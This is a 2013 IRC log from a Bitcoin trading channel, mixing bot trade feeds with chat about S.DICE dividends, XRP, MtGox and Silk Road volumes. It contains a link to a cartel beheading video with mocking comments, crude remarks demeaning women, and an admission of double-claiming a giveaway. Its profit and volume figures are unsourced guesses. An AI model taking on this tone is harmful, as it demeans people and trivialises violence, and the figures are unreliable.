00:06:24 scams Feb 24 00:06:58 okay, sounds good. ^^ just the average btc site then Feb 24 00:07:18 well, its listed, so its above avg. :p Feb 24 00:08:09 above average scam site ? :P Feb 24 00:08:32 its got the got milk slogan at least Feb 24 00:08:39 The options values are up a lot. Just you know... can't exit without paying the tollbooth Feb 24 00:09:07 https://bitcointalk.org/index.php?topic=146243.msg1553949#new Feb 24 00:09:09 this kid.. Feb 24 00:10:43 I feel bad for egging him now.. he might as well go with my suggestion.. >_> Feb 24 00:13:23 Bowjob, there's a home bet, too. Feb 24 00:14:03 but i'm now curious if they profited or lost on them Feb 24 00:15:18 [MPEX] [S.MPOE] 3265 @ 0.00062859 = 2.0523 BTC [-] Feb 24 00:15:22 [MPEX] [S.MPOE] 13900 @ 0.00062858 = 8.7373 BTC [-] Feb 24 00:15:30 [MPEX] [S.MPOE] 1385 @ 0.00062752 = 0.8691 BTC [-] Feb 24 00:15:37 home bet? Feb 24 00:15:54 and you're not using red here. it's suspicious. Feb 24 00:16:07 ?? Feb 24 00:16:08 Bowjob well that'd be it. Feb 24 00:16:56 jurov i think it was a slight loss in january Feb 24 00:17:18 but overall should come roughly 0.05 btc per bet as a net loss Feb 24 00:17:29 bowjob the first small bet everywhere is from bitbet itself Feb 24 00:20:58 [MPEX] [S.MPOE] 6350 @ 0.00062807 = 3.9882 BTC [+] Feb 24 00:21:00 [MPEX] [S.MPOE] 863 @ 0.00062752 = 0.5415 BTC [-] Feb 24 00:21:04 [MPEX] [S.MPOE] 8037 @ 0.00062731 = 5.0417 BTC [-] Feb 24 00:27:15 ;;google woolong Feb 24 00:27:16 Woolong - Cowboy Bebop Wiki: ; Urban Dictionary: woolong: ; A Fistful of Woolongs by *ninjaink on deviantART: Feb 24 00:28:53 mircea_popescu: I think your S.DICE per share numbers are off by a factor of 10. Feb 24 00:29:11 dividend per share should have been 20,000 satoshi last month Feb 24 00:29:14 right/ Feb 24 00:29:15 ? Feb 24 00:29:18 looking Feb 24 00:30:08 last month it made 20k btcs rght ? Feb 24 00:30:14 yeah Feb 24 00:30:17 2000 div Feb 24 00:30:22 to 10,00,000 shares Feb 24 00:30:37 2000 to 10,000,000 Feb 24 00:30:51 yeah I calculate 20,000 satoshis per share Feb 24 00:32:31 you know what you're right. Feb 24 00:32:32 [MPEX] [S.DICE] 2730 @ 0.00638996 = 17.4446 BTC [+] Feb 24 00:32:32 fixed. Feb 24 00:32:33 [MPEX] [S.DICE] 30994 @ 0.00638999 = 198.0514 BTC [+] Feb 24 00:32:44 too many damn zeros Feb 24 00:32:49 lol Feb 24 00:35:07 [BTCTC] [GSDPT] 1 @ 0.006 BTC [+] Feb 24 00:36:53 I think we should use scientific notation to prevent the counting of zeroes Feb 24 00:36:55 [MPEX] [S.MPOE] 4000 @ 0.00063049 = 2.522 BTC [+] Feb 24 00:36:57 [MPEX] [S.MPOE] 4357 @ 0.0006305 = 2.7471 BTC [+] Feb 24 00:37:24 new whale? same betting pattern... Feb 24 00:37:25 http://blockchain.info/address/12Gsb2qQA8ycGWchDxZ3XwbDcT5jUUzTwX Feb 24 00:37:51 0.00063049 is 6.3 x 10^-4 Feb 24 00:38:10 thats better than trying to count zeroes to make sure theres no fat finger Feb 24 00:40:51 or use uBTC like i said yest Feb 24 00:41:05 0.00063049 is 630.49 uBTC Feb 24 00:43:00 [MPEX] [S.DICE] 2000 @ 0.00607385 = 12.1477 BTC [-] Feb 24 00:43:29 [MPEX] [S.DICE] 1600 @ 0.00607384 = 9.7181 BTC [-] Feb 24 00:50:18 what happened to the crash up? Feb 24 00:50:31 !ticker Feb 24 00:50:31 It's so strange that you don't remember any of your poetry. Feb 24 00:50:41 ;;ticker Feb 24 00:50:42 BTCUSD ticker | Best bid: 29.56449, Best ask: 29.77000, Bid-ask spread: 0.20551, Last trade: 29.56445, 24 hour volume: 72285.84680059, 24 hour low: 28.00000, 24 hour high: 30.68990, 24 hour vwap: 29.06726 Feb 24 00:50:45 heh Feb 24 00:50:49 I guess I sold out at the right time Feb 24 00:50:58 don't be so sure Feb 24 00:51:16 Im not, because I sold out early to make the price jump to 60 Feb 24 00:51:23 I guess I failed :< Feb 24 00:51:31 I am panicked about this bounce back Feb 24 00:52:14 four more hours till 24hprc starts going up again Feb 24 00:52:21 ;;bc,24hprc Feb 24 00:52:22 29.01 Feb 24 00:52:33 or not Feb 24 00:54:15 I am a believer in S.DICE again. Feb 24 00:54:32 another set of addresses with 5k in them showed up today and started betting like crazy Feb 24 00:54:42 Im not Feb 24 00:54:48 Im waiting for the government to crash that party Feb 24 00:54:53 yeah Feb 24 00:54:57 illegal ventures never succeed in the long run Feb 24 00:54:58 that is the other issue Feb 24 00:55:02 LOL Feb 24 00:55:04 I justs pulled my sell orders at havelock Feb 24 00:55:05 lol Feb 24 00:55:10 I mean, unless you're the government Feb 24 00:55:27 ;;ticker Feb 24 00:55:27 BTCUSD ticker | Best bid: 29.56461, Best ask: 29.77979, Bid-ask spread: 0.21518, Last trade: 29.56461, 24 hour volume: 72197.98090640, 24 hour low: 28.00000, 24 hour high: 30.68990, 24 hour vwap: 29.06509 Feb 24 00:55:35 yeah we are crashing up, give it some time' Feb 24 00:55:41 its a bear trap Feb 24 00:55:42 lol Feb 24 00:56:02 actually, it is ONLY the illegal ventures that succeed in the long run Feb 24 00:56:07 weekend dip is halway done Feb 24 00:56:07 any government failed Feb 24 00:56:16 I'm predicting 14,000 BTC profit for S.DICE now Feb 24 00:56:17 prostitution is still here, drugs are still here, murder is still here. Feb 24 00:56:21 raising it Feb 24 00:56:26 if you check the fiat values Feb 24 00:56:42 .. 14k BTC is better than january's 20k? Feb 24 00:56:46 fiat values are irrelevant for us Feb 24 00:56:59 i guess we did pay a lot for the shares Feb 24 00:57:21 since we are trying to determine where to distribute a set of coins amongst several possible BTC options Feb 24 01:06:07 [BTCTC] [B.YABMC] 1 @ 0.00998 BTC [+] Feb 24 01:06:59 [BTCTC] [B.YABMC] 9 @ 0.00999 = 0.0899 BTC [+] Feb 24 01:14:29 [MPEX] [S.MPOE] 8500 @ 0.0006286 = 5.3431 BTC [-] Feb 24 01:14:33 [MPEX] [S.MPOE] 1217 @ 0.00062859 = 0.765 BTC [-] Feb 24 01:16:31 https://bitfunder.com/asset/CoinBr.iDiff-E April now open. With my prediction of difficulty to stay < 9.5m ... Feb 24 01:16:52 and MPBPT-E paid out 4.8% Feb 24 01:18:51 [MPEX] [S.MPOE] 3100 @ 0.00062859 = 1.9486 BTC [-] Feb 24 01:22:43 [MPEX] [S.MPOE] 6500 @ 0.00063049 = 4.0982 BTC [+] Feb 24 01:33:32 [MPEX] [S.DICE] 4 @ 0.00601184 = 0.024 BTC [-] Feb 24 01:46:50 [MPEX] [S.MPOE] 2000 @ 0.00063049 = 1.261 BTC [+] Feb 24 01:46:52 [MPEX] [S.MPOE] 1900 @ 0.0006305 = 1.198 BTC [+] Feb 24 01:50:21 [MPEX] [S.MPOE] 6283 @ 0.00062859 = 3.9494 BTC [-] Feb 24 01:50:23 [MPEX] [S.MPOE] 4000 @ 0.00062732 = 2.5093 BTC [-] Feb 24 01:50:28 [MPEX] [S.MPOE] 6963 @ 0.00062731 = 4.368 BTC [-] Feb 24 01:50:30 [MPEX] [S.MPOE] 1254 @ 0.0006273 = 0.7866 BTC [-] Feb 24 02:04:51 [MPEX] [S.MPOE] 4838 @ 0.0006305 = 3.0504 BTC [+] Feb 24 02:04:52 [MPEX] [S.MPOE] 2312 @ 0.00063051 = 1.4577 BTC [+] Feb 24 02:06:27 [MPEX] [O.BTCUSD.C250N] 12 @ 0.48371589 = 5.8046 BTC Feb 24 02:11:35 [MPEX] [S.MPOE] 16377 @ 0.00063051 = 10.3259 BTC [+] Feb 24 02:11:38 [HAVELOCK] [HIM] 1 @ 14.9199 BTC [+] Feb 24 02:15:18 [MPEX] [S.MPOE] 7662 @ 0.00063051 = 4.831 BTC [+] Feb 24 02:15:20 [MPEX] [S.MPOE] 2788 @ 0.00063072 = 1.7584 BTC [+] Feb 24 02:35:48 [MPEX] [S.MPOE] 6912 @ 0.00063072 = 4.3595 BTC [+] Feb 24 02:35:50 [MPEX] [S.MPOE] 10950 @ 0.00063119 = 6.9115 BTC [+] Feb 24 02:35:52 [MPEX] [S.MPOE] 5400 @ 0.00063309 = 3.4187 BTC [+] Feb 24 02:35:53 [MPEX] [S.MPOE] 2288 @ 0.00063364 = 1.4498 BTC [+] Feb 24 02:38:48 [MPEX] [S.MPOE] 5300 @ 0.0006273 = 3.3247 BTC [-] Feb 24 02:39:20 ;;ticker Feb 24 02:39:20 BTCUSD ticker | Best bid: 29.60001, Best ask: 29.72382, Bid-ask spread: 0.12381, Last trade: 29.60001, 24 hour volume: 71818.38413877, 24 hour low: 28.00000, 24 hour high: 30.68990, 24 hour vwap: 29.04099 Feb 24 02:40:06 ;;bc,24hprc Feb 24 02:40:08 28.95 Feb 24 02:41:01 we haven't had 2 down days in a row since Jan 2nd Feb 24 02:42:39 ;;bc,stats Feb 24 02:42:42 Current Blocks: 222780 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 995 blocks | Next Difficulty In About: 5 days, 22 hours, 59 minutes, and 38 seconds | Next Difficulty Estimate: 4318739.17584 | Estimated Percent Change: 18.28884 Feb 24 02:50:13 [BTCTC] [S.BBET-PT] 2 @ 0.00275 = 0.0055 BTC [+] Feb 24 02:50:15 [BTCTC] [S.BBET-PT] 98 @ 0.0028 = 0.2744 BTC [+] Feb 24 02:50:49 [MPEX] [S.MPOE] 3820 @ 0.00063364 = 2.4205 BTC [+] Feb 24 02:52:56 theres bird shit on my window Feb 24 02:53:19 [BTCTC] [COGNITIVE] 1 @ 0.31997 BTC [+] Feb 24 02:54:46 [BTCTC] [COGNITIVE] 2 @ 0.31998 = 0.64 BTC [+] Feb 24 02:54:48 [BTCTC] [COGNITIVE] 20 @ 0.32 = 6.4 BTC [+] Feb 24 02:54:52 [BTCTC] [COGNITIVE] 2 @ 0.33 = 0.66 BTC [+] Feb 24 02:57:08 [MPEX] [S.MPOE] 3446 @ 0.0006273 = 2.1617 BTC [-] Feb 24 02:57:10 [MPEX] [S.MPOE] 1073 @ 0.00062729 = 0.6731 BTC [-] Feb 24 02:57:20 you're welcome Feb 24 02:57:26 lol Feb 24 02:57:53 [BTCTC] [GSDPT] 121 @ 0.006 = 0.726 BTC [+] Feb 24 03:00:53 http://blogs.friendlybeings.com/fun/wp-content/uploads/2012/03/deal-with-it-580x385.jpg Feb 24 03:01:02 isnt bird shit supposed to be good luckt ho Feb 24 03:05:04 [MPEX] [S.MPOE] 242 @ 0.00063364 = 0.1533 BTC [+] Feb 24 03:07:54 wtf.. XRP is worth something now? Feb 24 03:09:21 less than a bird shit on a window Feb 24 03:11:42 lol Feb 24 03:12:10 I have 100k XRP Feb 24 03:12:13 waiting for parity Feb 24 03:12:14 lol Feb 24 03:12:19 dollar parity Feb 24 03:12:42 [MPEX] [S.MPOE] 7071 @ 0.00063683 = 4.503 BTC [+] Feb 24 03:13:24 who give the 50K away ? Feb 24 03:14:15 I shouldn't say this but.. Feb 24 03:14:20 I put my name twice.. Feb 24 03:14:33 first time I fucked up, and edited my post since Feb 24 03:14:41 I wrote other than my address Feb 24 03:14:48 the second dimt was in case i get skipped Feb 24 03:14:57 thats how i ended with 100k lol Feb 24 03:15:04 huh ? Feb 24 03:15:11 Haha n1 Feb 24 03:15:20 nice story in 10 years Feb 24 03:15:21 now they are doing 40k per user Feb 24 03:15:25 or 20 Feb 24 03:15:25 Yes of course Feb 24 03:15:25 ! Feb 24 03:15:31 heck make it 2 Feb 24 03:15:32 lol Feb 24 03:15:35 [HAVELOCK] [SDICE] 10 @ 0.68 = 6.8 BTC [+] Feb 24 03:15:42 2 months Feb 24 03:15:58 well we're at 1.5 BTC per 50k xrp Feb 24 03:16:07 .. maybe its a scam. maybe its not. Feb 24 03:16:32 [HAVELOCK] [SDICE] 19 @ 0.6809 = 12.9371 BTC [+] Feb 24 03:16:38 said some pp on 2009 :) Feb 24 03:17:38 i saw theymos selling 1000 btc per dollar Feb 24 03:17:39 back then Feb 24 03:17:41 for PP Feb 24 03:19:55 WTF, i slept those years. miss the train ! live changing opportunity :/ Feb 24 03:23:46 i;d have bought a million if i were around Feb 24 03:23:55 sadly, some fuckwit had to write about assasination markets. Feb 24 03:24:06 that added 6 months to the cooldown for btc in my case. Feb 24 03:27:31 [MPEX] [S.MPOE] 13336 @ 0.00063679 = 8.4922 BTC [-] Feb 24 03:28:32 when do you bouht your first BTC mp ? Feb 24 03:28:52 [BTCTC] [GSDPT] 650 @ 0.006 = 3.9 BTC [+] Feb 24 03:28:53 price, no date Feb 24 03:29:18 Bowjob: 1.5 btc/50k xrp...where? Feb 24 03:29:20 july 2011 Feb 24 03:29:32 bought 60 at 15ish Feb 24 03:29:46 would have bought 1mn at 1/10 of a cent just as well. Feb 24 03:29:57 sheeeit im an older bitcoiner than you mircea_popescu meheheh Feb 24 03:30:10 many are, i'm relatively new. Feb 24 03:30:31 n00b Feb 24 03:30:46 actually i'd say most names you've heard of / have a reputation other than scammer were here before me. Feb 24 03:32:13 http://blockchain.info/tx-index/1229255/d0aea3947509bba9eb9e953d84115979ee1bb8044ab16d15eda4c2aad9b90a34 Feb 24 03:32:16 actually there it is. Feb 24 03:32:36 wow 18 month after you, i bought lower my first at 13,xx Feb 24 03:33:02 ya well, i don't try to time it. i do capital allocation. Feb 24 03:34:54 https://bitcointalk.org/index.php?topic=146385.0 Feb 24 03:35:21 i'll just leave this here Feb 24 03:35:54 forums Feb 24 03:36:07 dust-otc you using opera ?! Feb 24 03:36:07 I forgot where but I think DeadTerra is buying lots of XRP Feb 24 03:36:36 wait. waitwait. is this the same fuckwit with the swedish credit cooperative etc ? Feb 24 03:38:55 chrome Feb 24 03:41:00 anyway. this bitcoininv kid is a pretty good source of funny. Feb 24 03:41:56 "I admire the ambition and for this stage of his career he's obviously cleared the bar, but it's also good for him to learn that in the real world security isn't graded on a curve, and people with more time and experience than him have failed to secure Rails apps." Feb 24 03:41:59 i like this quote. Feb 24 03:42:13 people with more experience being = to absolutely anyone stupid enough to try. Feb 24 03:45:04 [BTCTC] [BTC-MINING] 1 @ 0.43999 BTC [+] Feb 24 03:45:06 [BTCTC] [BTC-MINING] 1 @ 0.44 BTC [+] Feb 24 03:57:47 "Newest hybird Platform" Feb 24 04:11:52 [MPEX] [S.MPOE] 13100 @ 0.00063679 = 8.3419 BTC [-] Feb 24 04:26:23 [MPEX] [S.MPOE] 2372 @ 0.00063679 = 1.5105 BTC [-] Feb 24 04:26:36 [MPEX] [S.MPOE] 5000 @ 0.00063177 = 3.1589 BTC [-] Feb 24 04:44:36 ooh theres a new beheading vid from mexico Feb 24 04:47:43 yawn, seen one you've seen em all Feb 24 04:50:54 http://www.bestgore.com/beheading/los-zetas-beheading-three-members-gulf-cartel-nightmare-screams/ Feb 24 04:51:00 this one started screaming Feb 24 04:51:06 them mexicans are getting better at it Feb 24 04:53:34 [MPEX] [S.BBET] 1 @ 0.00196487 BTC [-] Feb 24 04:53:46 prostitution is still here, drugs are still here, murder is still here. Feb 24 04:54:17 prostitution is only illegal in cultural backwaters, drugs have only been illegal for 50 years, murder is perfectly legal when you call it war Feb 24 04:54:29 [MPEX] [S.MPOE] 4321 @ 0.00063373 = 2.7383 BTC [+] Feb 24 04:54:30 [MPEX] [S.MPOE] 2321 @ 0.00063385 = 1.4712 BTC [+] Feb 24 04:54:40 dub kinda my point now isnt it. Feb 24 04:56:05 these mexicans are swimmig in money.. and yet their cameras arent good enough Feb 24 04:56:31 anyone wanna play with socket mpex trades datastream? Feb 24 04:57:13 omg hax Feb 24 04:58:04 yeah i made this shit for sierra chart Feb 24 04:59:48 im gonna open up the protocol Feb 24 04:59:54 but it aint free. Feb 24 05:00:53 well it is, for a while Feb 24 05:02:50 [MPEX] [S.MPOE] 5507 @ 0.00063385 = 3.4906 BTC [+] Feb 24 05:02:52 [MPEX] [S.MPOE] 4321 @ 0.00063683 = 2.7517 BTC [+] Feb 24 05:02:55 [MPEX] [S.MPOE] 7807 @ 0.00063684 = 4.9718 BTC [+] Feb 24 05:03:05 ;;ticker Feb 24 05:03:06 BTCUSD ticker | Best bid: 29.59969, Best ask: 29.59996, Bid-ask spread: 0.00027, Last trade: 29.60000, 24 hour volume: 65078.39286134, 24 hour low: 28.00000, 24 hour high: 29.97000, 24 hour vwap: 28.93830 Feb 24 05:05:12 ahaha isn't this shot great ? http://polimedia.us/dtng/c/src/136167510323.jpg Feb 24 05:05:58 [MPEX] [S.MPOE] 4321 @ 0.000632 = 2.7309 BTC [-] Feb 24 05:06:00 [MPEX] [S.MPOE] 4529 @ 0.00063177 = 2.8613 BTC [-] Feb 24 05:08:31 [MPEX] [S.MPOE] 1161 @ 0.00063684 = 0.7394 BTC [+] Feb 24 05:08:32 [MPEX] [S.MPOE] 1239 @ 0.00063954 = 0.7924 BTC [+] Feb 24 05:19:46 [MPEX] [S.MPOE] 5228 @ 0.00063177 = 3.3029 BTC [-] Feb 24 05:19:48 [MPEX] [S.MPOE] 4321 @ 0.00063055 = 2.7246 BTC [-] Feb 24 05:19:49 [MPEX] [S.MPOE] 54900 @ 0.00063054 = 34.6166 BTC [-] Feb 24 05:19:56 [MPEX] [S.MPOE] 7751 @ 0.00063028 = 4.8853 BTC [-] Feb 24 05:22:36 [MPEX] [S.DICE] 459 @ 0.00578722 = 2.6563 BTC [-] Feb 24 05:22:38 [MPEX] [S.DICE] 541 @ 0.00601184 = 3.2524 BTC [+] Feb 24 05:27:11 prostitution is only illegal in cultural backwaters, drugs have only been illegal for 50 years, murder is perfectly legal when you call it war Feb 24 05:27:21 or when you call it National Security... Feb 24 05:27:43 and off people, your own citizens even, with drones. Feb 24 05:28:49 So much for the right to a fair trial or due process Feb 24 05:31:05 [MPEX] [S.MPOE] 17148 @ 0.00063028 = 10.808 BTC [-] Feb 24 05:31:06 [MPEX] [S.MPOE] 918 @ 0.00062729 = 0.5759 BTC [-] Feb 24 05:31:09 [MPEX] [S.MPOE] 2900 @ 0.00062663 = 1.8172 BTC [-] Feb 24 05:31:11 [MPEX] [S.MPOE] 6534 @ 0.00062653 = 4.0937 BTC [-] Feb 24 05:39:32 [MPEX] [S.MPOE] 1352 @ 0.00063954 = 0.8647 BTC [+] Feb 24 05:39:34 [MPEX] [S.MPOE] 4321 @ 0.0006402 = 2.7663 BTC [+] Feb 24 05:39:37 [MPEX] [S.MPOE] 6948 @ 0.00064021 = 4.4482 BTC [+] Feb 24 05:51:20 http://news.cnet.com/8301-13578_3-57570925-38/need-bitcoins-this-atm-takes-dollars-and-funds-your-account/ Feb 24 05:53:25 pretty cool Feb 24 05:56:04 i was thinking simmilar Feb 24 05:56:06 but Feb 24 05:56:11 not for bills Feb 24 05:56:13 for coins Feb 24 05:56:17 cause i fuckin hate coins Feb 24 05:56:28 so if this would be around Feb 24 05:56:33 id just throw them in Feb 24 05:56:38 this doesnt have a coin hole Feb 24 05:56:40 :( Feb 24 05:56:59 nobody wants coins anymore. Feb 24 05:57:13 i haven't accepted coins since at least 1999 Feb 24 05:57:31 what changed then? Feb 24 05:58:56 i got tired of having to buy new pants cause my pockets were broken Feb 24 05:59:12 meh Feb 24 05:59:19 i have a ton of coins at home Feb 24 05:59:29 they take em at the bank Feb 24 05:59:32 the problem is Feb 24 05:59:44 that bitch somehow always manages to take 30min of my time Feb 24 05:59:49 heh Feb 24 05:59:50 witch upselling Feb 24 05:59:56 and shit Feb 24 06:00:02 the largest coin here is half a leu which is a 6th of a dollar. Feb 24 06:00:09 who the fuck wants a 6th of a dollar ? Feb 24 06:00:12 gimme a hundred ty Feb 24 06:00:12 we have 2 euro here Feb 24 06:00:30 thats like 0.1 btc Feb 24 06:00:33 can be useful Feb 24 06:00:35 maybe the girl likes you Feb 24 06:00:51 yeah well its too late for that now Feb 24 06:01:03 it's never too late for a girl to like you lol Feb 24 06:01:21 she can like me by not upselling. Feb 24 06:01:28 everyone knows its anal. Feb 24 06:01:31 girls are weird like that Feb 24 06:01:39 they like guys the wrong ways all teh time Feb 24 06:01:48 or so i read somewhere. Feb 24 06:02:21 anyway im gonna send my bitch inthere Feb 24 06:02:25 to get rid of those coins Feb 24 06:02:29 lets see how long that takes Feb 24 06:02:41 maybe she ends up with a new girlfriend. Feb 24 06:02:51 they end up exchanging stories about you Feb 24 06:02:55 advice, shit like that. Feb 24 06:03:00 well, what can i say, i trully wouldnt be suprised. Feb 24 06:03:03 [MPEX] [S.MPOE] 7900 @ 0.00063662 = 5.0293 BTC [-] **** BEGIN LOGGING AT Sun Feb 24 14:45:06 2013 Feb 24 14:45:33 ;;tickler Feb 24 14:45:34 Error: "tickler" is not a valid command. Feb 24 14:45:36 heh Feb 24 15:10:51 [MPEX] [O.BTCUSD.P230T] 500 @ 0.08421619 = 42.1081 BTC [-] Feb 24 15:11:02 [MPEX] [O.BTCUSD.P270T] 500 @ 0.14736457 = 73.6823 BTC [-] Feb 24 15:11:14 [MPEX] [O.BTCUSD.P290T] 1000 @ 0.18647515 = 186.4752 BTC [-] Feb 24 15:11:35 [MPEX] [O.BTCUSD.P270T] 500 @ 0.14736457 = 73.6823 BTC [-] Feb 24 15:11:37 [BTCTC] [BTC-BOND] 7 @ 0.01 = 0.07 BTC [+] Feb 24 15:11:40 [MPEX] [O.BTCUSD.P230T] 500 @ 0.08421619 = 42.1081 BTC [-] Feb 24 15:17:19 !ticker m O.BTCUSD.P230T Feb 24 15:17:21 [MPEX:O.BTCUSD.P230T] 1D: 0.08421619 / 0.08421619 / 0.08421619 (1000 shares, 84.22 BTC), 7D: 0.02 / 0.10749695 / 0.13112771 (2004 shares, 215.42 BTC), 30D: 0.02 / 0.06790049 / 0.13112771 (10269 shares, 697.27 BTC) Feb 24 15:18:07 (23 - 29)/23 Feb 24 15:18:12 ;;calc (23 - 29)/23 Feb 24 15:18:12 -0.260869565217 Feb 24 15:18:39 ;;estimate Feb 24 15:18:46 Next difficulty estimate | 4319163.31016 based on data since last change | 4308400.33984 based on data for last three days Feb 24 15:19:10 !ticker X.IDIFF.MAR Feb 24 15:19:11 I thought I told you not to touch me. Feb 24 15:19:40 !ticker m X.IDIFF.MAR Feb 24 15:19:41 [MPEX:X.IDIFF.MAR] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.07595 / 0.07595 / 0.07595 (25 shares, 1.90 BTC), 30D: 0.0429 / 0.06613044 / 0.089 (363 shares, 24.01 BTC) Feb 24 15:19:56 [MPEX] [S.MPOE] 4201 @ 0.00063126 = 2.6519 BTC [-] Feb 24 15:19:58 [MPEX] [S.MPOE] 660 @ 0.00062619 = 0.4133 BTC [-] Feb 24 15:20:02 [MPEX] [S.MPOE] 5000 @ 0.00062542 = 3.1271 BTC [-] Feb 24 15:20:04 [MPEX] [S.MPOE] 10000 @ 0.00062541 = 6.2541 BTC [-] Feb 24 15:20:05 [MPEX] [S.MPOE] 10349 @ 0.00062538 = 6.4721 BTC [-] Feb 24 15:20:09 [MPEX] [S.MPOE] 26200 @ 0.00062516 = 16.3792 BTC [-] Feb 24 15:20:11 [MPEX] [S.MPOE] 11390 @ 0.00062443 = 7.1123 BTC [-] Feb 24 15:20:17 Namworld: bad selection? how mean. :P Why dont you help out and list a btc-bond or something. And there IS a trade api. just been working to make it nice for everyone. and what 'not as nice features' are you refering to? Might be on the list. :) Feb 24 15:21:23 the only place you can get MPBOR fund is bitfunder, and XDIFF passthroughs Feb 24 15:23:14 how's xdiff related to mpbor ? Feb 24 15:23:19 and the prices aren't pumped by funds multiplied to bid on all the assets Feb 24 15:23:20 email for all asset holders would be nice. Feb 24 15:23:25 mircea_popescu: its not Feb 24 15:23:27 a ok Feb 24 15:23:40 misread that Feb 24 15:23:49 And except for Deadterra's passthroughs, not much worthwile on Bitfunder yet. Feb 24 15:23:53 only place you can get those 2 sepearate things, a managed mpbor fund, and xdiff passthroughs, is bitfunder, to clarify Feb 24 15:24:17 I just like the way bids and everything is handled on BTCT.co too Feb 24 15:24:33 Not that your platform is bad =P Feb 24 15:25:10 But since I selected BTCT.co, I feel like I have to get people to use it more. Feb 24 15:27:30 [MPEX] [O.BTCUSD.P290T] 1000 @ 0.18644841 = 186.4484 BTC [-] Feb 24 15:31:21 Namworld: agreed and understood. :) Feb 24 15:31:48 Honestly, I do like some of the features of btct, I added some originally with BF. he has had alot of good ideas Feb 24 15:32:05 I have no shame in admitting that lol Feb 24 15:32:21 Just like he's liked some of my stuff. It's all about making things better for the users. Feb 24 15:32:32 Aye. Well honestly, it's not bad to be split multiple platforms. Feb 24 15:32:35 I use both. Feb 24 15:32:45 as for notifications, I have a large notifications system partially developed. I am trying to get my big project for BF done though Feb 24 15:32:59 when i get tired of working on it and need a break, i do little things Feb 24 15:33:23 but once I finish this project for BF, I will be knocking out a ton of small stuffs Feb 24 15:33:33 so I guess Im in a mostly good mood today Feb 24 15:33:35 Ukto: you need option passthrus Feb 24 15:33:43 Both platforms would need more assets and users tho. Not happening currently. No volume. Feb 24 15:33:44 thestringpuller: *giggle* :P Feb 24 15:33:52 thestringpuller: just you wait, until you see what I have up my sleeve. Feb 24 15:34:17 Namworld: I am working on 6 very interesting assets Feb 24 15:35:06 so options :P Feb 24 15:35:20 umm, not quite. Feb 24 15:35:21 yeah, that kind of thing just doesn't happen on BTCT.co with voting Feb 24 15:35:23 mircea_popescu is right we need an options composite Feb 24 15:35:37 We wouldn't be able to batch import option passthroughs Feb 24 15:35:55 Namworld: I am sure burnside could figure something out.. Feb 24 15:36:14 hi there! can anyone tell me where the graph in this post https://bitcointalk.org/index.php?topic=101902.msg1552103#msg1552103 comes from ? Feb 24 15:36:49 isnt that the sdice graph ? Feb 24 15:37:18 yep Feb 24 15:37:31 seen it before, not sure where its hosted tho Feb 24 15:37:35 fydel it comes from dooglus, if you click the link above it you'll see Feb 24 15:37:39 someone else here should Feb 24 15:37:58 oh, is douglas manually producing them based on site data? Feb 24 15:38:12 Ukto it's not site data, someone wrote a chain traverser Feb 24 15:38:19 ah sou Feb 24 15:38:19 they just parse all the sdice addresses periodically. Feb 24 15:38:51 as of that last post profit was: 67,956.41 Feb 24 15:38:52 i think bugpowder has a copy too, i don't recall where it is on github Feb 24 15:38:57 the totals column Feb 24 15:39:02 that seems awfully high Feb 24 15:39:04 something like that. Feb 24 15:39:17 last month was like 20k btc wasnt it? Feb 24 15:39:19 no, sdice made like 60-70k, mpoe made like 20k or so, there's a reason these are the top bitcoin corps. Feb 24 15:39:24 nobody else comes even remotely close. Feb 24 15:39:55 mircea_popescu ok..thank you....so internet site where I can see it in real time? Feb 24 15:40:05 fydel not unless you write it yourself. Feb 24 15:40:05 there isnt one Feb 24 15:40:06 how much does mtgox make? Feb 24 15:40:07 mircea_popescu: bitinstant does Feb 24 15:40:13 i don't think it would be too hard, just get the parser and run it Feb 24 15:40:13 you have to wait for someone to scrape the data and make one Feb 24 15:40:27 mircea_popescu no way I am lazy and dump as shit Feb 24 15:40:27 thestringpuller how do you know ? Feb 24 15:40:41 fydel well then it may have to wait a little. Feb 24 15:41:16 pizzaman1337 they'd be around there, possibly, but haven't had a report out in like 18 months i think Feb 24 15:41:33 they did monthly reporting too for a few months but then gave up Feb 24 15:42:18 mircea_popescu: its not hard to figure out gox's profits Feb 24 15:42:26 the last 30 days they made some 80~100k USD worth Feb 24 15:42:37 due tot he mass influx of cash Feb 24 15:42:42 not bad Feb 24 15:42:55 thats including the BTC earnings tho Feb 24 15:42:56 mircea_popescu: lemme rephrase silk road is THE top BTC business atm Feb 24 15:43:10 thestringpuller: really? last I saw it was mostly dead. Feb 24 15:43:29 thestringpuller bs. Feb 24 15:43:32 although someone told me that there has been alot more guns and ammo lately Feb 24 15:43:34 with all the bs going on Feb 24 15:43:38 you're working on maybe 2011 data. or 2010. Feb 24 15:43:58 Ukto you seen the sort of expenditure they do ? Feb 24 15:44:20 nah Feb 24 15:44:25 wait SR? Feb 24 15:44:26 no Feb 24 15:44:28 you can check the feedback Feb 24 15:44:30 havent looked at SR in like a year Feb 24 15:44:36 Ukto nono, not sr, mtgox Feb 24 15:44:45 gox's expendatures are not that high Feb 24 15:44:48 around 20~25k Feb 24 15:44:51 but the feedback is happening less now so most the of the transactions are ghost Feb 24 15:44:55 yeah. 20-25 btc iirc. Feb 24 15:44:57 beteen mark, his few employees, the office Feb 24 15:45:11 his office is expensive Feb 24 15:45:17 but not THAT expensive Feb 24 15:45:30 im too lazy to dig up the data, but most of 2012 they ran in the red. Feb 24 15:45:33 it was only like.. 5 small offices off of a hallway Feb 24 15:45:36 15k-18k btc per day in transaction volume for SR based on 2012 figures Feb 24 15:45:41 ^ mircea_popescu Feb 24 15:45:47 link ? Feb 24 15:47:52 ;;google arstechnica silk road Feb 24 15:47:53 Study estimates $2 million a month in Bitcoin drug sales | Ars Technica: ; Feds shutter online narcotics store that used TOR to ... - Ars Technica: ; (1 more message) Feb 24 15:47:57 ^- mircea_popescu Feb 24 15:48:10 first link Feb 24 15:48:18 dude. Feb 24 15:48:34 some clueless noob calling his farting "a study" is not going to wash in this conversation. Feb 24 15:48:58 oh you want an abstract and a white paper too? Feb 24 15:49:01 no. Feb 24 15:49:05 I do Feb 24 15:49:14 Produced br SR themselves. Feb 24 15:49:15 :P Feb 24 15:49:21 by Feb 24 15:49:22 absent a statement from the owner itself, i want to see the estimate of someone i know and respect. Feb 24 15:49:38 otherwise, we might as well steal the numbers off of RIAA/MPAA's piracy estimates Feb 24 15:49:40 mircea_popescu: does that person exist? someone you know and respect? ;) Feb 24 15:49:50 or for that matter, off of Bush's wmd's estimates. Feb 24 15:49:54 Ukto surely. Feb 24 15:50:00 hehe 